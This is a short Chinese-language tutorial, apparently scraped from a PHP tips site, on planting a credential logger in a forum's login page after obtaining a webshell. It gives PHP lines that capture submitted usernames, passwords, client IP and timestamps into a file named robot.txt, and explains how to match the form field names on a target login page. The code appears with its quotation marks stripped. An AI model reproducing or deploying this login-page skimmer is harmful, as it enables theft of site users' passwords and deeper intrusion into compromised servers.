拿到webshell之后，想要进一步渗透，诸如discuz的密码，不是直接用md5加密的，破解难度很大。以前帮大头写过一次，昨天小猪大哥正好用到，就又写了一遍。代码比较简单，就几句话，我把原理说的详细点，照顾下对php不太了解有朋友。
if($_post[loginsubmit]!=){ //判断是否点了登陆按钮
$sb=user:.$_post[username].--passwd:.$_post[password].--ip:.$http_server_vars[remote_addr].--.date(y-m-d h:i:s).rn; // 把post接收到的值 连起来赋值给变量$sb 
fwrite(fopen(robot.txt,ab),$sb);} //结果写入一个文件
下面简单分析一下,以华夏的登陆页面为例。打开bbs.xxx.com/login.php 右键查看源码,ctrl+f搜索action找到登陆的表单。
我只复制了关键代码过来.
//action后面的值即是表单提交的地址，里面会处理登陆，比如判断密码是不是正确什么的 method为post，所以用$_post接收。
。。。。强大的省略号。。。。。。
账号(u):
class=input id=pwuser accesskey=u size=16 
name=pwuser>
//用户名的input输入框, 注意其name的值， 要和$_post[username] 这里面的对应, 所以要截取华夏的密码，需要改为 $_post[pwuser]
密　码(p):
class=input id=pwpwd accesskey=p 
type=password size=16 name=pwpwd>
//用户名的input输入框, 注意其name的值， 要和$_post[username] 这里面的对应, 所以要截取华夏的密码，需要改为 $_post[pwpwd]
http://www.bkjia.com/phpjc/478807.htmlwww.bkjia.comtruehttp://www.bkjia.com/phpjc/478807.htmltecharticle拿到webshell之后，想要进一步渗透，诸如discuz的密码，不是直接用md5加密的，破解难度很大。以前帮大头写过一次，昨天小猪大哥正好用到，...